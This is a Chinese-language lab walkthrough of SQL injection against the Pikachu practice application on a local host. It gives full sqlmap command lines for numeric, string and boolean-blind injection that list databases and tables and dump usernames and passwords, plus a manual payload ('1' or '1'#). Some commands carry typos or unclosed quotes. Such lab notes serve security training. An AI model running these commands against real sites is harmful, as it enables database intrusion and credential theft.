sql注入

数字型注入

任意提交数据，使用bp抓包得到post方式提交的参数为 id=1&submit=%E6%9F%A5%E8%AF%A2

使用sqlmap跑post方式时的格式：python2 sqlmap.py -u "<url>" --data="<post提交的参数>" -<参数>

使用sqlmap跑数据库

python2 sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" - f --dbms mysql --dbs --batch

可以得到数据库名称

#--dbms 默认情况下会探测web应用后端的数据库是什么；该步骤--dbms mysql 制定了数据库类型为myslq数据库

#--dbs 当用户有权读取时，列出所有的数据库

#--batch 该参数使用后不需要用户输入，将会使用sqlmap给的默认提示走下去

python2 sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" - f --dbms mysql -D pikachu --tables --batch

可以得到指定数据库下的表

-D pikachu 指定数据库pikachu

#--tables 当有权限读取pikachu数据库中的表tables的时候，读取出表

python2 sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" -f --dbms mysql -D pikachu -T users --columns --batch

获取指定表下的列

#-T users 指定表名users

#--columns 当有权限读取表users中的列的时候读取表users中的列

获取列username和password中的字段内容

python2 sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" -f --dbms mysql -D pikachu -T users -C username,password --dump --batch

#-C username,password 指定读取列username和password中的字段内容

#--dump 抛出前面指定内容

字符型注入

输入1' or '1'# 用bp 抓包 可看到参数返回

爆出所有库

E:\safe\sqlmap\sqlmap-1.2>python sqlmap.py -u "http://test.com/pikachu/vul/sqli/

sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --dbs

用pikachu数据库进行获取表和对应的列column

表：E:\safe\sqlmap\sqlmap-1.2>python sqlmap.py -u "http://test.com/pikachu/vul/sqli/

sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu --table -

batch

列：E:\safe\sqlmap\sqlmap-1.2>python sqlmap.py -u "http://test.com/pikachu/vul/sqli/

sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu -t users

--column -batch

拿到username和password

E:\safe\sqlmap\sqlmap-1.2>python sqlmap.py -u "http://test.com/pikachu/vul/sqli/

sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu -T users

-C username,password --dump

盲注(基于boolian)

在框中随便输入数据，抓包得到进行注入的url

python2 sqlmap.py -u "http://localhost/pikachu-master/pikachu-master/vul/sqli/sqli_blind_b.php?name=777777&submit=%E6%9F%A5%E8%AF%A2 --current-db

得到pikachu数据库，然后

python2 sqlmap.py -u "http://localhost/pikachu-master/pikachu-master/vul/sqli/sqli_blind_b.php?name=777777&submit=%E6%9F%A5%E8%AF%A2 -D pikachu --tables

继续

python2 sqlmap.py -u "http://localhost/pikachu-master/pikachu-master/vul/sqli/sqli_blind_b.php?name=777777&submit=%E6%9F%A5%E8%AF%A2 -D pikachu -T users -columns获取users表

然后

python2 sqlmap.py -u "http://localhost/pikachu-master/pikachu-master/vul/sqli/sqli_blind_b.php?name=777777&submit=%E6%9F%A5%E8%AF%A2 -D pikachu -T users -C username,password --dump即获得用户名与密码